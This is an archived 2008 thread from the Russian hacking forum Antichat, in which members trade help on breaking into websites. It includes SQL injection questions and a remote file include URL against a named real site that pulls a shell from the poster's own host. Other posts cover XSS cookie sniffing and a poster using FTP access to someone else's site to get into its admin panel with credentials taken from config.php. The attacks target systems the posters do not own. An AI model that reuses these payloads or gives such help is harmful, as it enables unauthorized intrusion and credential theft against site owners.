ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
05.02.2008, 22:15
|
|
Познающий
Регистрация: 22.02.2006
Сообщений: 50
Провел на форуме:
256744
Репутация:
16
|
|
Сообщение от Lesnoy_chelovek
m0use, ты видишь все таблицы SQL, там же будут и от форума.
Втом то и дело что некоторые таблицы я вижу а именно таблиц форума я не нашел.
Сообщение от Lesnoy_chelovek
UPDATE имя_таблицы SET поле=значение
как это в брайзере должно выглядеть, методом тыка уже пробовал и UNION добавлял и без него... поэтому и спрашиваю как правильно!?
|
|
|
05.02.2008, 22:29
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287
Репутация:
4738
|
|
Уязвим ли следующий код php:
PHP код:
if(!isset($_POST['adminusr'])) $_POST['adminusr']='';
if(!isset($_POST['adminpwd'])) $_POST['adminpwd']='';
if ($_POST['adminusr']==$admin_usr and $_POST['adminpwd']==$admin_pwd) {echo "зашли!";}
else {echo "идём лесом";}
При условии что спецсимволы не экранируются, т.е magic_quotes_gpc = 0?
Последний раз редактировалось -=lebed=-; 05.02.2008 в 22:32..
|
|
|
|
05.02.2008, 22:29
|
|
Познающий
Регистрация: 31.08.2007
Сообщений: 94
Провел на форуме:
422909
Репутация:
200
|
|
Втом то и дело что некоторые таблицы я вижу а именно таблиц форума я не нашел.
А ты пробовал использовать limit?
как это в брайзере должно выглядеть, методом тыка уже пробовал и UNION добавлял и без него... поэтому и спрашиваю как правильно!?
Запросы типа UPDATE работают крайне редко! Такая фишка с изменением базы не катит!
|
|
|
|
06.02.2008, 14:45
|
|
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
Провел на форуме:
1050662
Репутация:
435
|
|
народ, может кто знает уъязвимость на укозе, хсс там или еще что, срочно надо, искал не нашел =(
|
|
|
|
06.02.2008, 17:38
|
|
Banned
Регистрация: 15.01.2008
Сообщений: 63
Провел на форуме:
399884
Репутация:
46
|
|
Я вот нашел пхп инклуд вот здесь: http://www.dorodango-method.com/index.php а когда пробую залить шелл http://www.dorodango-method.com/index.php?page=http://mysite.ru/shell.php
Шел отображается нормально, но файлы отображаются те которые у меня на сайте, и команды тоже выполняются относительно моего сайта.. В чем трабл?
|
|
|
|
06.02.2008, 18:37
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
WeddRRRyss там нет инклуда
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
Последний раз редактировалось Constantine; 06.02.2008 в 19:12..
|
|
|
|
06.02.2008, 23:22
|
|
Участник форума
Регистрация: 17.01.2008
Сообщений: 170
Провел на форуме:
1608606
Репутация:
105
|
|
Когда я пытаюсь внедрить свой код в активный xss(работает скрипт) " и ' фильтруются. Когда ввожу скрипт со сниффом в 16 системе, то скрипт не выполняется. Что не так?
|
|
|
|
Админку и пароли нашел токо ... |
06.02.2008, 23:43
|
|
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509
Репутация:
338
|
|
Админку и пароли нашел токо ...
У меня есть полный доступ к FTP одного сайта, я там покавырялся и нашел админку на сайте, путь выглядит так _www.site.ru/AdminSite/start.php , (вот скрин админки ) потом я там в FTP поискал пароли, и в той папке где админка AdminSite есть еще папка tc и там есть файл config.php открыл я этот .php файл вот сам код
PHP код:
<?
//Файл: config.php
//Назначение: хранение настраиваемых переменных
//===========================================
error_reporting(0);
//Начальный хост (адрес начальной папки через HTTP,
//например: "http://mysite.ru" или "http:/pupkin.ru/home")
$host_1 = "http://site.ru".$HTTP_HOST;
//Начальная директория
$path_1 = $DOCUMENT_ROOT;
//Имя пользоввателя (надо поменять!)
$login_1 = "site";
//Пароль для входа в программу (надо поменять!)
$pass_1 = "****";
//Количество файлов, доступных для загрузки на сервер
//(четное число, например: 4, 6, 8 ...)
$files_to_upload = 10;
?>
Ну короче видите там где login и pass
PHP код:
//Имя пользоввателя (надо поменять!)
$login_1 = "site";
//Пароль для входа в программу (надо поменять!)
$pass_1 = "****";
Ввел тут _www.site.ru/AdminSite/start.php как там в config.php логин и пароль и не заходит, менял в config.php логин и пароль токо не фига, может это вообще логин и пароль не от админки? Просто я решил если они находятся в одной папке что это оно)
Спасибо за внимание
Если не в том разделе сорри  (но кажется тот)
Токо не пинайте pls, если я не понятно обяснил напишите) просто хочу дойти до конца
Последний раз редактировалось CaNNabi$; 06.02.2008 в 23:46..
|
|
|
|
06.02.2008, 23:49
|
|
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885
Репутация:
447
|
|
не очень понятно зачем нужна админка если есть доступ к ftp а так вообще исходник start.php не судьба посмотреть?
|
|
|
|
06.02.2008, 23:52
|
|
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509
Репутация:
338
|
|
Сообщение от }{0TT@БЬ)Ч
не очень понятно зачем нужна админка если есть доступ к ftp а так вообще исходник start.php не судьба посмотреть?
я смотрел там ничего нету), все мне говорят зачем нуна админка если есть доступ к фтп, )
Ответ: просто для себя хочу узнать) новые знания пригодятся)
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
